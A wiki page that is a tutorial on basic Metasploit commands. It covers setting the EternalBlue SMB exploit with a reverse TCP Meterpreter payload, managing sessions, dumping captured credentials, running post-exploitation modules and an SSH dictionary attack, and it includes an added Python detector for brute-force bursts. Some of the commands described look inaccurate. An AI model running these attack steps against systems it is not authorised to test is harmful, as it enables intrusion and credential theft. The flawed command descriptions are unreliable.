METASPLOIT - Base Commands: Difference between revisions
Revision as of 16:35, 13 December 2025
Starting Metasploit Console
To start the Metasploit Framework console, use the following command:
msfconsole
This launches the Metasploit interactive console, where you can execute various commands for penetration testing.
Search for Exploits
To search for a specific exploit module or vulnerability in Metasploit:
search <search_term>
For example, to search for exploits related to "Windows SMB":
search smb windows
This will list all relevant exploits, auxiliary modules, and payloads.
Show Available Modules
To list all available Metasploit modules, use:
show modules
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.
Use an Exploit Module
To use an exploit module:
use <module_path>
For example, to use an SMB exploit:
use exploit/windows/smb/ms17_010_eternalblue
This sets the module for use in the current session.
Show Module Options
To view the options available for a specific module:
show options
This displays required and optional parameters for the current module.
Set Module Options
To set the required parameters for an exploit, such as the target IP address:
set RHOST <target_ip>
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way.
Show Payloads
To list all available payloads for a specific exploit:
show payloads
This will show the payloads compatible with the currently selected exploit.
Select and Set Payload
To select and configure a payload:
set PAYLOAD <payload_name>
For example, to set a reverse TCP payload:
set PAYLOAD windows/meterpreter/reverse_tcp
You can then set specific options for the payload, like the LHOST (local host IP):
set LHOST <local_ip>
- Example:
set LHOST 192.168.1.100
Running the Exploit
Once the module and payload are set, you can run the exploit:
exploit
This will execute the exploit and attempt to gain access to the target machine.
Running the Exploit in Background
If you want to run the exploit in the background without blocking the terminal:
exploit -j
The `-j` flag runs the exploit as a background job.
Show Sessions
To view active sessions after exploiting a target:
sessions
This command shows a list of all active sessions (Meterpreter or shell sessions).
Interact with a Session
To interact with a specific session:
sessions -i <session_id>
For example, to interact with session 1:
sessions -i 1
This gives you a shell or Meterpreter prompt for that session.
Background a Session
To background a session and return to the main Metasploit console:
background
This command puts the current session in the background, allowing you to continue working on other tasks in the console.
Session Cleanup
To terminate a specific session:
sessions -k <session_id>
For example:
sessions -k 1
This closes session 1.
Exploit Vulnerability Verification
To verify if a specific vulnerability exists on the target machine, use the following command:
check
This will run basic checks to determine if the target is vulnerable to the selected exploit.
List Credentials
If you have gained access to the target system and want to list available credentials:
creds
This command shows all credentials (e.g., username and password pairs) captured during the session.
Save Your Progress
To save the current state of your Metasploit session (including all modules, options, and sessions):
save
This will save your current Metasploit environment to the default location.
Load a Saved Workspace
To load a saved Metasploit workspace:
workspace -r <workspace_file>
This will restore your saved workspace, including all settings, modules, and sessions.
Managing Workspaces
To list all available workspaces:
workspace
To create a new workspace:
workspace -a <workspace_name>
To switch between workspaces:
workspace <workspace_name>
- Example:
workspace my_new_workspace
Running Auxiliary Modules
To use an auxiliary module (e.g., a scanner):
use auxiliary/scanner/portscan/tcp
You can then set the target and run the module just like with an exploit.
Start a Post-Exploitation Module
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:
use post/windows/gather/enum_logged_on_users
This collects information about logged-on users on the Windows target.
Show Help for Commands
To get help for a specific command or module, use:
help <command>
For example, to get help on the `sessions` command:
help sessions
This will display detailed usage instructions and options for the command.
Advanced Search for Exploits
You can use advanced search queries to filter modules by specific parameters:
search type:exploit platform:windows name:ms17_010
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.
Check for Dependencies
To check if a module has any missing dependencies before use:
check_dependencies
This command will list any missing libraries or files needed to run a module.
Perform a Dictionary Attack
To use a dictionary attack against an SSH service, for example:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
This runs an SSH login brute-force attack using the specified username and password lists.
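From the defender's side, a dictionary attack like the one above leaves a burst of failed sshd logins from one source across many usernames. The following is an added example, not part of the original page or of Metasploit, that parses constructed sshd log lines and flags a source once it reaches a failure threshold inside a time window, also reporting any login that succeeded after the burst; the threshold, window and sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (syslog format); 192.0.2.10 is a wordlist-style burst,
# 198.51.100.7 is a user mistyping a password, for contrast.
SAMPLE_LOG = """\
Dec 13 16:30:01 bastion sshd[2101]: Failed password for invalid user admin from 192.0.2.10 port 51022 ssh2
Dec 13 16:30:02 bastion sshd[2103]: Failed password for invalid user test from 192.0.2.10 port 51024 ssh2
Dec 13 16:30:02 bastion sshd[2105]: Failed password for root from 192.0.2.10 port 51026 ssh2
Dec 13 16:30:03 bastion sshd[2107]: Failed password for invalid user oracle from 192.0.2.10 port 51028 ssh2
Dec 13 16:30:03 bastion sshd[2109]: Failed password for invalid user guest from 192.0.2.10 port 51030 ssh2
Dec 13 16:30:04 bastion sshd[2111]: Accepted password for deploy from 192.0.2.10 port 51032 ssh2
Dec 13 16:31:10 bastion sshd[2120]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Dec 13 16:45:40 bastion sshd[2130]: Failed password for alice from 198.51.100.7 port 40002 ssh2
Dec 13 16:45:41 bastion sshd[2131]: Accepted publickey for alice from 198.51.100.7 port 40003 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and "Accepted publickey for X from IP".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def parse_line(line, year=2025):
    """Return a dict with ts/result/user/ip, or None for lines that are not auth events."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies one (assumed 2025 here).
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: summary} for every source with >= threshold failures inside one window.
    The summary also lists users whose login succeeded at or after the end of the burst,
    which is the case an analyst needs to act on first."""
    by_ip = defaultdict(list)
    for event in filter(None, map(parse_line, log_text.splitlines())):
        by_ip[event["ip"]].append(event)
    alerts = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        fails = [e for e in events if e["result"] == "Failed"]
        start = 0
        for end in range(len(fails)):           # sliding window over failures only
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = fails[start:end + 1]
                later_ok = [e["user"] for e in events
                            if e["result"] == "Accepted" and e["ts"] >= burst[-1]["ts"]]
                alerts[ip] = {"failures": len(burst),
                              "distinct_users": len({e["user"] for e in burst}),
                              "success_after_burst": later_ok}
                break
    return alerts
```

Running `detect_bruteforce(SAMPLE_LOG)` flags only 192.0.2.10, with five failures across five usernames and a later successful login for `deploy`; the two spaced-out failures from 198.51.100.7 never reach the threshold.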
Display Environment Variables
To display the current environment variables in Metasploit:
env
This will show details about the current environment, including system and framework-specific variables.
Exit Metasploit Console
To exit the Metasploit console:
exit
This command will close the Metasploit Framework console and return to the command-line prompt.
